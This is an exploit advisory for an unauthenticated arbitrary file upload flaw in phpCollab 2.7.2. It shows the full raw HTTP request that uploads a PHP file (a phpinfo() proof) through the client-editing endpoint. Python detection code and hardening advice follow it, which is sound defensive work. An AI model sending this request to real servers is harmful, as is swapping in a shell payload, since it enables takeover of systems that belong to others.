#/
#* phpCollab 2.7.2 - Arbitrary File Upload
#* Author : Trung Le
#* Tutorial Video : https://www.youtube.com/watch?v=zHuJkoQe4Tc
#* Twitter : @lethanhtrungdbp
#* Facebook : fb.com/c0nc4nh0
#* Blog: baomatcoban.info
#/
The following HTTP request allows an unauthenticated attacker to upload a malicious PHP file.
The server stores the upload as a file named `$id.extension`.
Request:
----------
POST /phpcol/clients/editclient.php?action=add& HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------42876024093685464851592998730
Content-Length: 1280
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/phpcol/clients/editclient.php?&
Upgrade-Insecure-Requests: 1

-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000000
-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="owner"

1
-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="name"

Process 2.7
-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="address"


-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="phone"


-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="url"


-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="email"


-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="comments"


-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="hourly_rate"


-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="upload"; filename="index.php"
Content-Type: application/octet-stream

<?php
phpinfo();
-----------------------------42876024093685464851592998730--
----------
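
Detection logic for the request above, added here as an example (it is not part of the original advisory or of phpCollab): it parses a captured raw request and flags POSTs to `clients/editclient.php?action=add` that carry no Cookie header, a file part with a PHP-executable extension, or a PHP open tag in the uploaded bytes. The function names, the extension list, the finding labels and the "no Cookie header means unauthenticated" heuristic are assumptions; the sample requests are constructed.

```python
import re
from email.parser import BytesParser
from email.policy import HTTP

# Assumed list of extensions the web server hands to PHP; match it to the real handler config.
SCRIPT_EXTS = {"php", "phtml", "phar", "pht", "php3", "php4", "php5", "php7"}
# Endpoint and action taken from the request shown in the advisory.
TARGET = re.compile(r"/clients/editclient\.php\?(?:[^#]*&)?action=add(?:&|$)")

def inspect_request(raw: bytes) -> list[str]:
    """Return findings for one raw HTTP request; an empty list means nothing flagged."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, _, headers = head.partition(b"\r\n")
    fields = request_line.decode("latin-1").split(" ")
    if len(fields) != 3 or fields[0] != "POST" or not TARGET.search(fields[1]):
        return []
    # HTTP headers plus a multipart body parse as a MIME message.
    msg = BytesParser(policy=HTTP).parsebytes(headers + b"\r\n\r\n" + body)
    findings = []
    if msg["Cookie"] is None:  # assumption: authenticated sessions always send a cookie
        findings.append("no-cookie")
    if not msg.is_multipart():
        return findings
    for part in msg.iter_parts():
        filename = part.get_filename()
        if not filename:
            continue  # ordinary form field, not a file part
        # Trailing dots/spaces are stripped so "x.php." is still treated as PHP.
        ext = filename.lower().rstrip(". ").rpartition(".")[2]
        if ext in SCRIPT_EXTS:
            findings.append(f"script-extension:{filename}")
        if b"<?php" in (part.get_payload(decode=True) or b"").lower():
            findings.append(f"php-open-tag:{filename}")
    return findings

def sample(cookie: str, filename: str, content: str) -> bytes:
    """Constructed request shaped like the one above (boundary shortened to 'B')."""
    lines = ["POST /phpcol/clients/editclient.php?action=add& HTTP/1.1", "Host: 127.0.0.1",
             *([f"Cookie: {cookie}"] if cookie else []),
             "Content-Type: multipart/form-data; boundary=B", "",
             "--B", 'Content-Disposition: form-data; name="name"', "", "Process 2.7",
             "--B", f'Content-Disposition: form-data; name="upload"; filename="{filename}"',
             "Content-Type: application/octet-stream", "", content, "--B--", ""]
    return "\r\n".join(lines).encode()

if __name__ == "__main__":
    print(inspect_request(sample("", "index.php", "<?php phpinfo();")))
```

The same checks belong server-side as well: an upload handler that requires a valid session and accepts only an allow-list of extensions would reject this request before any file is written.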